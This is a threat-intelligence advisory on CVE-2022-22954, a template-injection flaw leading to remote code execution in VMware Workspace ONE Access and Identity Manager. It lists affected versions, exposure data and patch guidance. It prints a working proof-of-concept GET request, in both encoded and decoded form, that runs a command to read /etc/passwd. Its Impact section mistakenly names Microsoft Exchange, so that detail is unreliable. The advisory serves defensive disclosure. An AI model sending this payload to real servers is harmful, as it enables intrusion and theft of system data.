Category: Vulnerability Intelligence	Vulnerability Class: Server-Side Template Injection/RCE	CVE ID: CVE-2022-22954	CVSS:3.0 Score: 9.8

Executive Summary

• CloudSEK’s Customer Threat Research Team analyzed remote code execution impacting Vmware products that include Workspace ONE Access and Identity Manager.
• The VMware Workspace ONE Access provides users faster access to SaaS, web, and native mobile apps with Multi-Factor Authentication (MFA), conditional access, and single sign-on functionality and the VMware Identity Manager is Workspace ONE's identity and access management component.
• The server-side template injection has been assigned CVE-2022-22954 with a maximum CVSSv3 score of 9.8 and affected VMware versions include:
  • VMware Workspace ONE Access Appliance - 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
  • VMware Identity Manager Appliance - 3.3.6, 3.3.5, 3.3.4, 3.3.3
• VMWare has released the patches essential to fix this vulnerability.

Analysis

• On 6 April 2022, VMWare released an advisory addressing eight vulnerabilities present in Multiple VMWare products.
• CVE-2022-22954 is a server-side template injection vulnerability that can lead to remote code execution on the affected versions. It impacts the VMWare Workspace ONE Access as well as VMware Identity Manager and has been assigned a critical CVSSv3 base score of 9.8.
• To exploit the vulnerability, an attacker with network access simply needs to send a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.
• The successful exploitation of the vulnerability could result in remote code execution on the vulnerable server.

Information from OSINT

• A Shodan search revealed that 711 publicly exposed VMWare Workspace One instances.
• Several threat actors including APT groups have targeted VMWare products in the past to conduct attacks ranging from ransomware to espionage.

[caption id="attachment_19186" align="alignnone" width="1097"] Publicly reachable VMWare Workspace One Instances[/caption]  

Information from Cybercrime Platforms

• Multiple threat actors have been discussing this vulnerability on various cybercrime forums and Telegram channels. (For more information refer to the Appendix)
• The discussions comprise the following information:
• Methods of leveraging the impact by chaining exploits.
• Shodan queries to search for vulnerable instances in the wild.
• Functioning proof of concepts (PoCs) by request using intercepting tools like BurpSuite.

How does SSTI Result in Remote Code Execution?

• An SSTI(server-side template injection) vulnerability results in the ability to execute commands on the remote server. This attack vector is very well documented and affects almost all the major backend infrastructures and related templates e.g. - FreeMarker/Java, Velocity/Java, Twig/PHP, Jade/Nodejs and the list goes on.
• Server-side template injection attacks can occur whenever user input is concatenated directly into a template, rather than being passed in as data. Hence, attackers can manipulate the template engine by injecting arbitrary template directives.
• An attacker can use this to execute commands and execute reverse shell payloads that could potentially result in Remote Code Execution. This makes the vulnerability extremely easy to exploit while granting complete server control.

POC (Proof of Concept)

{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61% 72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%7 8%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f %70%61%73%73%77%64%22%29%7d   PoC for CVE-2022-22954

• The above GET request will return the contents of the /etc/passwd file from a vulnerable server.
• The URL encoded string given as a parameter to the deviceUdid argument is: ${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}

Impact & Mitigation

Impact	Mitigation
Attackers could use this exploit to gain unauthorized access and gain higher privileges to Microsoft Exchange Servers. This vulnerability could even lead to an RCE (Remote code execution) attack. RCE can lead to devastating attacks including but not limited to ransomware campaigns.	Apply the latest hotfixes released by VMWare for the version in use.

References

• ^#https://en.wikipedia.org/wiki/Traffic_Light_Protocol
• https://www.vmware.com/security/advisories/VMSA-2022-0011.html
• https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-001
• https://blog.segu-info.com.ar/2022/04/vulnerabilidades-criticas-de-vmware.html

Appendix

[caption id="attachment_19187" align="alignnone" width="1600"] PoC of the exploitation of CVE-2022-22954[/caption]   [caption id="attachment_19188" align="alignnone" width="580"] A threat actor discussing the vulnerability on a Telegram channel[/caption]   [caption id="attachment_19189" align="alignnone" width="1263"] A threat actor posting about the vulnerability on a cybercrime forum[/caption]